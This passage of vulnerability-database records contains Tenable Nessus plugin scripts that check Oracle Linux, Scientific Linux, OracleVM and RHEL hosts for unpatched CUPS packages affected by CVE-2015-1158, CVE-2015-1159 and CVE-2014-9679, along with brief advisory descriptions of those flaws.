scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-June/005129.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-June/005130.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-ipptool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-client / cups-devel / cups-filesystem / cups-ipptool / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:00:05", "references": ["http://www.nessus.org/u?1b3237cb"], "pluginID": "84259", "description": "A string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nAfter installing this update, the cupsd daemon will be restarted automatically.", "edition": 4, "reporter": "Tenable", "published": "2015-06-18T00:00:00", "title": "Scientific Linux Security Update : cups on SL6.x, SL7.x i386/x86_64", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-07-06T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150617_CUPS_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84259", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84259);\n script_version(\"$Revision: 2.3 $\");\n script_cvs_date(\"$Date: 2015/07/06 13:45:35 $\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n\n script_name(english:\"Scientific Linux Security Update : cups on SL6.x, SL7.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nAfter installing this update, the cupsd daemon will be restarted\nautomatically.\"\n );\n # http://listserv.fnal.gov/scripts/wa.exe?A2=ind1506&L=scientific-linux-errata&F=&S=&P=11940\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1b3237cb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-debuginfo-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-debuginfo-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:52:26", "references": ["https://oss.oracle.com/pipermail/oraclevm-errata/2015-June/000319.html"], "pluginID": "84257", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - CVE-2015-1158, CVE-2015-1159, CVE-2014-9679 (bug #1229982).", "edition": 7, "reporter": "Tenable", "published": "2015-06-18T00:00:00", "title": "OracleVM 3.3 : cups (OVMSA-2015-0071)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "OracleVM Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2018-07-24T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.3", "p-cpe:/a:oracle:vm:cups", "p-cpe:/a:oracle:vm:cups-libs"], "id": "ORACLEVM_OVMSA-2015-0071.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84257", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2015-0071.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84257);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n\n script_name(english:\"OracleVM 3.3 : cups (OVMSA-2015-0071)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2015-1158, CVE-2015-1159, CVE-2014-9679 (bug\n #1229982).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2015-June/000319.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected cups / cups-libs packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! ereg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-libs\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-13T16:49:33", "references": ["https://access.redhat.com/errata/RHSA-2015:1123", "https://access.redhat.com/security/cve/cve-2015-1158", "https://access.redhat.com/security/cve/cve-2014-9679", "https://access.redhat.com/security/cve/cve-2015-1159"], "pluginID": "84258", "description": "Updated cups packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar operating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the cupsd daemon will be restarted automatically.", "edition": 9, "reporter": "Tenable", "published": "2015-06-18T00:00:00", "title": "RHEL 6 / 7 : cups (RHSA-2015:1123)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:cups-debuginfo", "p-cpe:/a:redhat:enterprise_linux:cups-ipptool", "p-cpe:/a:redhat:enterprise_linux:cups-devel", "p-cpe:/a:redhat:enterprise_linux:cups", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:cups-libs", "p-cpe:/a:redhat:enterprise_linux:cups-filesystem", "cpe:/o:redhat:enterprise_linux:7.1", "p-cpe:/a:redhat:enterprise_linux:cups-client", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:cups-php", "p-cpe:/a:redhat:enterprise_linux:cups-lpd"], "id": "REDHAT-RHSA-2015-1123.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84258", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1123. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84258);\n script_version(\"2.13\");\n script_cvs_date(\"Date: 2018/11/10 11:49:54\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"RHEL 6 / 7 : cups (RHSA-2015:1123)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1123\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1158\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-9679\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-ipptool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1123\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"cups-debuginfo-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", 